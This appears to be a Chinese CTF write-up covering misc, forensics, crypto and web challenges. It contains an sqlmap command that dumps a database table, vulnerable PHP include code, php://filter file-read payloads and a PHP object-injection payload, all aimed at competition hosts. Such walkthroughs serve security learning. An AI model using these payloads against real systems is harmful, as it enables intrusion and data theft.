本文最后更新于 552 天前,其中的信息可能已经有所发展或是发生改变。
- 根据压缩包注释,猜测字符集为01的密码,长度
1-9,爆破得到flag
foremost分离文件,得到一个pdf,直接Ctrl+A,Ctrl+C
- 直接对分离文件,得到带有注释的压缩包
- password is (md5(virus_file) + lhost_ip)
- 存在大量ELF木马文件
| a = open("hacker_traffic.pcapng", 'rb').read() |
| a = a.hex() |
| b = [16055, 55019, 92151, 129283, 166415, 203547, 240679, 277811, 314943, 352075, 389207, 426339, 463471, 500603, 537735, 574867, 611999, 649131, 686263, 723395, 760527, 797659, 839291, 876423, 913555, 950687, 987819, 1024951, 1062083, 1099215, 1136347, 1173479, 1210611, 1247743, 1284875, 1322007, 1359139, 1396271, 1433403, 1470535, 1507667, 1544799, 1581931, 1619063, 1656195, 1693327, 1730459, 1767591, 1804723, 1841855, 1878987, 1916119, 1953251, 1990383, 2027515, 2064647, 2101779, 2138911, 2176043, 2213175, 2250307, 2287567, 2324699, 2361959, 2399091, 2436223, 2473355, 2510487, 2547619, 2584751, 2621883, 2659015, 2696147, 2733279, 2770411, 2807543, 2844675, 2881807, 2918939, 2956071, 2993203, 3030335, 3067467, 3104599, 3141731, 3178863, 3215995, 3253127, 3290259, 3327391, 3364523, 3401655, 3438787, 3475919, 3513051, 3550183, 3587315, 3624447, 3661579, 3698711] |
| |
| for i in b: |
| open(f"test/{i}", "wb").write(bytes.fromhex(a[i * 2:i * 2 +33792])) |
- 发现一个ip地址,运行一下抓个包,判断此地址就是
lhost
- 接下来算MD5,发现值不对,可能是结尾有多的东西,写个脚本生成个字典
| from hashlib import md5 |
| |
| |
| a = open('2287567', 'rb').read() |
| |
| file = open('test.txt', 'a') |
| for i in range(len(a)): |
| file.write(md5(a[:-i]).hexdigest() + '192.168.3.201\n') |
| from flag import secret |
| key = "x.x.x.x" |
| |
| |
| def encrypt_flag(flag, key): |
| random.seed(key) |
| table = list(range(0, 38)) |
| random.shuffle(table) |
| flag = [flag[i] for i in table] |
| ascii_flag = [ord(c) for c in flag] |
| random.seed(key) |
| xor_key = random.randint(0, 255) |
| encrypted_flag = [c ^ xor_key for c in ascii_flag] |
| return base64.b64encode(bytes(encrypted_flag)).decode("ascii") |
| print(encrypt_flag(flag, key)) |
| |
| import base64 |
| |
| def decrypt(t): |
| flag = base64.b64decode(t).decode("ascii") |
| xor_key = 96 |
| ascii_flag = [ord(c) for c in flag] |
| encrypted_flag = ''.join([chr(c ^ xor_key) for c in ascii_flag]) |
| table = [25, 28, 7, 24, 5, 0, 33, 21, 1, 31, 29, 2, 18, 27, 19, 13, 22, 9, 30, 10, 3, 11, 35, 15, 20, 16, 4, 23, 37, 36, 17, 32, 6, 34, 8, 26, 14, 12] |
| a = [i for i in range(38)] |
| for i in range(38): |
| a[table[i]] = encrypted_flag[i] |
| print(''.join(a)) |
| |
| |
| decrypt("VFVWU1kGBgIMUlMBVFcBBgRRBFAHVFBVUFkbUB0DAQMEBVIGAlE=".encode()) |
| python sqlmap.py -u http://62be1f5b518e59a9.node.nsctf.cn/login.php --data="username=admin&password=admin" -D ctf -T f111 --dump --batch |
| <!-- |
| $flag = "***********"; |
| if(!isset($_GET['a']) or !isset($_GET['b'])) |
| { |
| die("NONONO"); |
| } |
| if(file_get_contents($_GET['a'])!== "flag") |
| { |
| die("NONONO"); |
| } |
| if(file_get_contents($_GET['b'])!==$_GET['c']) |
| { |
| die("NONONO"); |
| } |
| if(isset($_GET['d'])) |
| { |
| include($_GET['d']); |
| }--> |
- 读取
route.php
- read=php://filter/read=convert.base64-encode/resource=route.php&input=1
- read=php://filter/read=convert.base64-encode/resource=h1nt.php&input=1
- read=h1nt.php&input=O:4:”test”:1:{s:8:”position”;s:57:”php://filter/read=convert.base64-encode/resource=f14g.php”;}
